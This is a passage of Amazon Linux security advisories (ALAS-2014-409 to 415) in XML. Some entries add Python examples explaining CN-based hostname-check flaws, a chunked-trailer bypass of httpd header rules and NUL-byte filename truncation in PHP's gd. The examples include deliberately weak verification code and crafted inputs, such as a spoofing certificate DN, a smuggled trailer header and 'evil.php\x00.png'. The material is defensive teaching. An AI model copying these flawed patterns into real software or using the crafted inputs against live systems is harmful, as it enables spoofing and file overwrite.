</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3618" title="" id="CVE-2014-3618" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1172.html" title="" id="RHSA-2014:1172" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="procmail-debuginfo" version="3.22" release="25.1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/procmail-debuginfo-3.22-25.1.6.amzn1.x86_64.rpm</filename></package><package name="procmail" version="3.22" release="25.1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/procmail-3.22-25.1.6.amzn1.x86_64.rpm</filename></package><package name="procmail" version="3.22" release="25.1.6.amzn1" epoch="0" arch="i686"><filename>Packages/procmail-3.22-25.1.6.amzn1.i686.rpm</filename></package><package name="procmail-debuginfo" version="3.22" release="25.1.6.amzn1" epoch="0" arch="i686"><filename>Packages/procmail-debuginfo-3.22-25.1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-409</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-409: medium priority package update for fwsnort</title><issued date="2014-09-17 21:46:00" /><updated date="2014-09-19 12:08:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0039:
Untrusted search path vulnerability in fwsnort before 1.6.4, when not running as root, allows local users to execute arbitrary code via a Trojan horse fwsnort.conf in the current working directory.
1060602:
CVE-2014-0039 fwsnort: configuration file can be loaded from cwd when run as a non-root user
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0039" title="" id="CVE-2014-0039" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="fwsnort" version="1.6.4" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/fwsnort-1.6.4-1.5.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-410</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-410: important priority package update for jakarta-commons-httpclient</title><issued date="2014-09-17 21:47:00" /><updated date="2014-09-19 12:09:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3577:
It was found that the fix for CVE-2012-6153 was incomplete: the code added to check that the server hostname matches the domain name in a subject's Common Name (CN) field in X.509 certificates was flawed. A man-in-the-middle attacker could use this flaw to spoof an SSL server using a specially crafted X.509 certificate.
1129074:
CVE-2014-3577 Apache HttpComponents client: SSL hostname verification bypass, incomplete CVE-2012-6153 fix
CVE-2012-6153:
It was found that the fix for CVE-2012-5783 was incomplete: the code added to check that the server host name matches the domain name in a subject's Common Name (CN) field in X.509 certificates was flawed. A man-in-the-middle attacker could use this flaw to spoof an SSL server using a specially crafted X.509 certificate.
1129916:
CVE-2012-6153 Apache HttpComponents client: SSL hostname verification bypass, incomplete CVE-2012-5783 fix
CVE-2012-5783:
The Jakarta Commons HttpClient component did not verify that the server hostname matched the domain name in the subject's Common Name (CN) or subjectAltName field in X.509 certificates. This could allow a man-in-the-middle attacker to spoof an SSL server if they had a certificate that was valid for any domain name.
Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
873317:
CVE-2012-5783 jakarta-commons-httpclient: missing connection hostname check against X.509 certificate name
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5783" title="" id="CVE-2012-5783" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6153" title="" id="CVE-2012-6153" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3577" title="" id="CVE-2014-3577" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jakarta-commons-httpclient-manual" version="3.1" release="15.8.amzn1" epoch="1" arch="noarch"><filename>Packages/jakarta-commons-httpclient-manual-3.1-15.8.amzn1.noarch.rpm</filename></package><package name="jakarta-commons-httpclient-demo" version="3.1" release="15.8.amzn1" epoch="1" arch="noarch"><filename>Packages/jakarta-commons-httpclient-demo-3.1-15.8.amzn1.noarch.rpm</filename></package><package name="jakarta-commons-httpclient-javadoc" version="3.1" release="15.8.amzn1" epoch="1" arch="noarch"><filename>Packages/jakarta-commons-httpclient-javadoc-3.1-15.8.amzn1.noarch.rpm</filename></package><package name="jakarta-commons-httpclient" version="3.1" release="15.8.amzn1" epoch="1" arch="noarch"><filename>Packages/jakarta-commons-httpclient-3.1-15.8.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-411</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-411: important priority package update for squid</title><issued date="2014-09-17 21:47:00" /><updated date="2014-09-19 12:09:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3609:
A flaw was found in the way Squid handled malformed HTTP Range headers. A remote attacker able to send HTTP requests to the Squid proxy could use this flaw to crash Squid.
CVE-2013-4115:
A buffer overflow flaw was found in Squid's DNS lookup module. A remote attacker able to send HTTP requests to the Squid proxy could use this flaw to crash Squid.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4115" title="" id="CVE-2013-4115" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3609" title="" id="CVE-2014-3609" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1148.html" title="" id="RHSA-2014:1148" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid" version="3.1.10" release="22.16.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.1.10-22.16.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.1.10" release="22.16.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.1.10-22.16.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.1.10" release="22.16.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.1.10-22.16.amzn1.i686.rpm</filename></package><package name="squid" version="3.1.10" release="22.16.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.1.10-22.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-412</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-412: important priority package update for axis</title><issued date="2014-09-17 21:47:00" /><updated date="2014-09-19 12:09:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3596:
It was discovered that Axis incorrectly extracted the host name from an X.509 certificate subject's Common Name (CN) field. A man-in-the-middle attacker could use this flaw to spoof an SSL server using a specially crafted X.509 certificate.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3596" title="" id="CVE-2014-3596" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1193.html" title="" id="RHSA-2014:1193" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="axis" version="1.2.1" release="7.5.14.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-1.2.1-7.5.14.amzn1.noarch.rpm</filename></package><package name="axis-javadoc" version="1.2.1" release="7.5.14.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-javadoc-1.2.1-7.5.14.amzn1.noarch.rpm</filename></package><package name="axis-manual" version="1.2.1" release="7.5.14.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-manual-1.2.1-7.5.14.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-413</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-413: medium priority package update for subversion</title><issued date="2014-09-17 21:48:00" /><updated date="2014-09-19 12:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3522:
The Serf RA layer in Apache Subversion 1.4.0 through 1.7.x before 1.7.18 and 1.8.x before 1.8.10 does not properly handle wildcards in the Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof servers via a crafted certificate.
1127063:
CVE-2014-3522 subversion: incorrect SSL certificate validation in Serf RA (repository access) layer
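Three advisories in this batch are the same weakness in different TLS clients: ALAS-2014-410 (jakarta-commons-httpclient, a flawed check of the hostname against the subject CN), ALAS-2014-412 (axis, the host name extracted incorrectly from the CN field) and ALAS-2014-413 (subversion's Serf layer mishandling wildcards in the CN or subjectAltName). The Python below is an added example, not code from HttpClient, Axis or Subversion. It shows a hypothetical weak CN extraction (a substring search over the DN string) next to a strict one that parses RDNs, and a hostname match that prefers dNSName SANs over the CN and constrains wildcards to a whole leftmost label with at least two labels after it. The certificate subject strings are constructed.

```python
# Added example: server hostname verification against an X.509 certificate
# (not code from HttpClient, Axis or Subversion). The certificate is modelled
# as its SAN dNSName list plus the subject DN as an RFC 4514 string.
import ipaddress
import re


def parse_dn(dn):
    """Split a DN string into (ATTR, value) pairs, honouring backslash escapes
    so a comma inside a value does not start a new RDN."""
    rdns, current, escaped = [], [], False
    for ch in dn:
        if escaped:
            current.append(ch)
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == ",":
            rdns.append("".join(current))
            current = []
        else:
            current.append(ch)
    rdns.append("".join(current))
    pairs = []
    for rdn in rdns:
        attr, sep, value = rdn.partition("=")
        if not sep:
            raise ValueError("malformed RDN: %r" % rdn)
        pairs.append((attr.strip().upper(), value.strip()))
    return pairs


def cn_naive(dn):
    """Illustrative weak extraction (hypothetical, not any library's code):
    the first 'CN=' substring anywhere in the DN, even inside another
    attribute's value, is taken as the Common Name."""
    m = re.search(r"CN=([^,]+)", dn)
    return m.group(1) if m else None


def cn_strict(dn):
    """Common Name only from an RDN whose attribute type really is CN."""
    for attr, value in parse_dn(dn):
        if attr == "CN":
            return value
    return None


def dns_name_matches(pattern, hostname):
    """Match one certificate name against the hostname.

    Wildcard rules: the wildcard must be the whole leftmost label, may not
    span a dot, and needs at least two further labels, so '*.com' cannot
    match every host under a TLD and '*.example.com' does not match
    'a.b.example.com'."""
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    p_labels = pattern.split(".")
    h_labels = hostname.split(".")
    if not all(p_labels) or not all(h_labels):
        return False
    if "*" not in pattern:
        return pattern == hostname
    if p_labels[0] != "*" or "*" in pattern[2:] or 3 > len(p_labels):
        return False
    return len(h_labels) == len(p_labels) and p_labels[1:] == h_labels[1:]


def verify_hostname(hostname, san_dns=(), subject_dn=None):
    """True if the certificate is valid for hostname. When the certificate
    carries any dNSName SAN the CN is ignored entirely (RFC 6125); IP-literal
    hosts would need iPAddress SANs and are refused here."""
    try:
        ipaddress.ip_address(hostname)
        return False
    except ValueError:
        pass
    if san_dns:
        return any(dns_name_matches(n, hostname) for n in san_dns)
    cn = cn_strict(subject_dn) if subject_dn else None
    return cn is not None and dns_name_matches(cn, hostname)


# Constructed attacker certificate subject: the real CN is attacker.example,
# but an OU value was chosen to contain the text 'CN=www.bank.example'.
TRICKY_DN = "OU=CN=www.bank.example, CN=attacker.example, O=Mallory"

if __name__ == "__main__":
    print(cn_naive(TRICKY_DN), cn_strict(TRICKY_DN))
    print(verify_hostname("www.bank.example", subject_dn=TRICKY_DN))
    print(verify_hostname("www.example.com", san_dns=["*.com"]))
```

Two design points carry the weight: the CN is never looked at when SANs are present, and wildcard matching compares label lists rather than doing string suffix or regex matching, which is where wildcard bugs of the Serf kind tend to originate.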
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3522" title="" id="CVE-2014-3522" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="subversion-javahl" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion-python" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion-debuginfo" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.8.10" release="1.44.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/subversion-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="subversion" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="mod_dav_svn" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="subversion-python" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.8.10-1.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2014-414</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-414: low priority package update for httpd</title><issued date="2014-09-17 21:48:00" /><updated date="2014-09-19 12:10:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-5704:
The mod_headers module in the Apache HTTP Server 2.2.22 allows remote attackers to bypass "RequestHeader unset" directives by placing a header in the trailer portion of data sent with chunked transfer coding. NOTE: the vendor states "this is not a security issue in httpd as such."
1082903:
CVE-2013-5704 httpd: bypass of mod_headers rules via chunked requests
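The mechanism behind CVE-2013-5704 is an ordering problem: a header filter such as RequestHeader unset runs over the request header block, but a chunked request may carry further header fields in its trailer section after the last chunk, and if those are merged into the header table afterwards the filtered header reappears. The Python below is an added example and not mod_headers or httpd code: a minimal chunked-request parser, a filter that models a single unset rule, and the vulnerable and fixed merge orders side by side. The request is constructed.

```python
# Added example: how a header filter applied before dechunking can be bypassed
# by a chunked-request trailer (not httpd's mod_headers code).

# Policy stand-in for `RequestHeader unset X-Forwarded-For`: the application
# behind the proxy must never see a client-supplied value for this header.
UNSET_HEADERS = {"x-forwarded-for"}


def _parse_header_lines(blob):
    headers = {}
    for line in blob.split(b"\r\n"):
        if line:
            name, _, value = line.partition(b":")
            headers[name.strip().decode("ascii").lower()] = value.strip().decode("ascii")
    return headers


def dechunk(data):
    """Decode a chunked body; return (body, trailer headers)."""
    body, pos, trailer_blob = bytearray(), 0, b""
    while True:
        line_end = data.index(b"\r\n", pos)
        size = int(data[pos:line_end].split(b";")[0], 16)  # ignore chunk extensions
        pos = line_end + 2
        if size == 0:
            trailer_blob = data[pos:].partition(b"\r\n\r\n")[0]
            break
        body += data[pos:pos + size]
        pos += size + 2  # chunk data plus its trailing CRLF
    return bytes(body), _parse_header_lines(trailer_blob)


def parse_request(raw):
    head, _, rest = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = _parse_header_lines(b"\r\n".join(lines[1:]))
    body, trailers = b"", {}
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body, trailers = dechunk(rest)
    return lines[0].decode("ascii"), headers, body, trailers


def apply_unset(headers):
    return {k: v for k, v in headers.items() if k not in UNSET_HEADERS}


def headers_seen_by_app_vulnerable(raw):
    """Filter runs on the header block only; trailers are merged afterwards,
    so a trailer re-introduces the header the rule removed."""
    _, headers, _, trailers = parse_request(raw)
    merged = apply_unset(headers)
    merged.update(trailers)
    return merged


def headers_seen_by_app_fixed(raw):
    """Apply the rule to the union of headers and trailers (equivalently:
    do not merge trailers into the header table at all)."""
    _, headers, _, trailers = parse_request(raw)
    merged = dict(headers)
    merged.update(trailers)
    return apply_unset(merged)


# Constructed request: the header-block X-Forwarded-For is removed by the
# rule; the copy in the trailer is what reaches the application.
SAMPLE_REQUEST = (
    b"POST /app HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"X-Forwarded-For: 203.0.113.7\r\n"
    b"\r\n"
    b"5\r\nhello\r\n"
    b"0\r\n"
    b"X-Forwarded-For: 10.0.0.1\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    print(headers_seen_by_app_vulnerable(SAMPLE_REQUEST))
    print(headers_seen_by_app_fixed(SAMPLE_REQUEST))
```

Of the two fixes modelled here, upstream httpd took the second: since the release that closed this issue, trailers are no longer merged into the request headers unless the MergeTrailers directive is switched on, so header rules cannot be undone by a trailer.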
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5704" title="" id="CVE-2013-5704" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd-debuginfo" version="2.2.29" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.29-1.4.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.29" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.29-1.4.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.29" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.29-1.4.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.29" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.29-1.4.amzn1.noarch.rpm</filename></package><package name="httpd" version="2.2.29" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.29-1.4.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.29" release="1.4.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.29-1.4.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.29" release="1.4.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.29-1.4.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.29" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.29-1.4.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.29" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.29-1.4.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.29" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.29-1.4.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.29" release="1.4.amzn1" epoch="0" 
arch="i686"><filename>Packages/httpd-tools-2.2.29-1.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-415</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-415: medium priority package update for php55</title><issued date="2014-09-18 21:03:00" /><updated date="2014-09-19 12:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-5120:
gd_ctx.c in the GD component in PHP 5.4.x before 5.4.32 and 5.5.x before 5.5.16 does not ensure that pathnames lack %00 sequences, which might allow remote attackers to overwrite arbitrary files via crafted input to an application that calls the (1) imagegd, (2) imagegd2, (3) imagegif, (4) imagejpeg, (5) imagepng, (6) imagewbmp, or (7) imagewebp function.
1132793:
CVE-2014-5120 php: gd extension NUL byte injection in file names
CVE-2014-3587:
Integer overflow in the cdf_read_property_info function in cdf.c in file through 5.19, as used in the Fileinfo component in PHP before 5.4.32 and 5.5.x before 5.5.16, allows remote attackers to cause a denial of service (application crash) via a crafted CDF file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1571.
1128587:
CVE-2014-3587 file: incomplete fix for CVE-2012-1571 in cdf_read_property_info
CVE-2014-2497:
The gdImageCreateFromXpm function in gdxpm.c in libgd, as used in PHP 5.4.26 and earlier, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted color table in an XPM file.
1076676:
CVE-2014-2497 gd: NULL pointer dereference in gdImageCreateFromXpm()
CVE-2012-1571:
A denial of service flaw was found in the way the File Information (fileinfo) extension parsed certain Composite Document Format (CDF) files. A remote attacker could use this flaw to crash a PHP application using fileinfo via a specially crafted CDF file.
805197:
CVE-2012-1571 file: out of bounds read in CDF parser
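CVE-2014-5120 in the list above is a C-string truncation at a language boundary: PHP strings may contain NUL bytes, but once the pathname reaches a C API such as fopen() everything after the first NUL is ignored, so a name that passes an extension check in PHP as evil.php followed by a NUL and .png is created on disk as evil.php. The Python below is an added illustration, not PHP's or gd's code. It models the C-level view of the path, shows why an extension check on the full string is bypassed, and performs the validation a caller of a native library should do before handing over a user-controlled name: reject embedded NUL, enforce the extension, and confine the resolved path to a base directory.

```python
# Added example: embedded-NUL truncation at a C boundary and the pre-check
# that prevents it (illustration; not PHP or libgd code).
import os

ALLOWED_EXT = {".png", ".gif", ".jpg", ".jpeg"}


def as_c_string(path):
    """What a C API like fopen() sees: the bytes before the first NUL."""
    return path.split("\x00", 1)[0]


def check_extension_only(path):
    """Validation an application might do in the scripting language:
    looks only at the extension of the full (NUL-containing) string."""
    return os.path.splitext(path)[1].lower() in ALLOWED_EXT


def safe_output_path(base_dir, user_name):
    """Return the absolute path a native image writer may use, or raise.

    Rejects NUL bytes (they would silently truncate the path in C), then
    enforces the extension on the real name and confines the result to
    base_dir so '../' cannot escape it."""
    if "\x00" in user_name:
        raise ValueError("NUL byte in filename")
    if not check_extension_only(user_name):
        raise ValueError("disallowed extension")
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, user_name))
    if full != base and not full.startswith(base + os.sep):
        raise ValueError("path escapes base directory")
    return full


def demo(user_name):
    """Compare the extension-only verdict with the path C would actually open."""
    return check_extension_only(user_name), as_c_string(user_name)


if __name__ == "__main__":
    # Constructed input: passes the extension check, written as evil.php in C.
    print(demo("evil.php\x00.png"))
```

The NUL check has to happen in the high-level language, because by the time the string has crossed into C the information that a NUL was present is already gone.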
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1571" title="" id="CVE-2012-1571" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2497" title="" id="CVE-2014-2497" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3587" title="" id="CVE-2014-3587" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5120" title="" id="CVE-2014-5120" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-fpm" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.17" 
release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package 
